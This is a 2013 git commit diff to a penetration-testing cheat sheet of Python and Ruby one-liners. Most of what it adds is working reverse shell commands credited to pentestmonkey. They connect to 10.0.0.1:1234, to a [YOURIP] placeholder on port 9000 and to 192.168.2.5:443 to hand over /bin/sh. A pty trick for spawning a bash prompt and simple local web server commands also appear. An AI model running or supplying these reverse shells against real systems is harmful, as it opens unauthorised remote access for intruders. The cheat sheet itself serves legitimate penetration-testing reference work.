Adding content from the Google Docs form submissions

This commit is contained in:
webbreacher 2013-12-05 21:51:40 -05:00
parent 27bc0bb41f
commit 2c44bf1168
2 changed files with 14 additions and 7 deletions

View File

@ -5,9 +5,16 @@ One liners
**Start a web server that serves the local files on port 8000, single threaded** **Start a web server that serves the local files on port 8000, single threaded**
```python ```python
python -m SimpleHTTPServer 8000 python -m SimpleHTTPServer 8000```
```
**Python reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)** **Python reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'```
```python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'``` **Reverse Shell to YOURIP on port 9000**
```python
python -c "import socket,subprocess,os;host=\"[YOURIP]\";port=9000;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"```
**Spawn bash shell prompt**
```python
python -c 'import pty; pty.spawn("/bin/bash")'```

View File

@ -4,9 +4,9 @@ One liners
----------- -----------
**Start a web server that serves the local files from current directory on port 8001** **Start a web server that serves the local files from current directory on port 8001**
```ruby
```ruby -run -e httpd -- -p 8001 .``` ruby -run -e httpd -- -p 8001 .```
**Reverse /bin/sh shell on port 443 from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)** **Reverse /bin/sh shell on port 443 from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
```ruby
```ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'``` ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'```